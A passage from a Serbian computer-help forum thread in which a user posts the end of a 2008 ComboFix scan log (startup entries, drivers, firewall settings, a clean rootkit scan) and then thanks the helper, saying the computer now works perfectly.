"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]
"egui"="C:\Program Files\ESET\ESET Smart Security\egui.exe" [2008-03-13 16:48 1443072]

C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=

R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
R3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]

.
Contents of the 'Scheduled Tasks' folder
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************

catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-03 17:46:07
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
Completion time: 2008-06-03 17:47:30
ComboFix-quarantined-files.txt  2008-06-03 15:47:23
ComboFix2.txt  2008-06-03 12:05:43
ComboFix3.txt  2008-06-02 19:53:06

Pre-Run: 29,154,091,008 bytes free
Post-Run: 29,144,064,000 bytes free

180   --- E O F ---   2008-05-16 20:47:53


e brate hvala ti mnogo evo komp radi perfektno

Poslao: 03 Jun 2008 19:17
Idi na vrh
offline
  • dr_Bora  Male
  • Anti Malware Fighter
    Rank 2
  • Pridružio: 24 Jul 2007
  • Poruke: 12280
  • Gde živiš: Höganäs, SE

MyCity » Ambulanta -> Arhiva Ambulante » virus!

Ko je trenutno na forumu
 

Ukupno su 900 korisnika na forumu :: 4 registrovanih, 0 sakrivenih i 896 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: bigfoot, Srle993, TBF1D, Valter071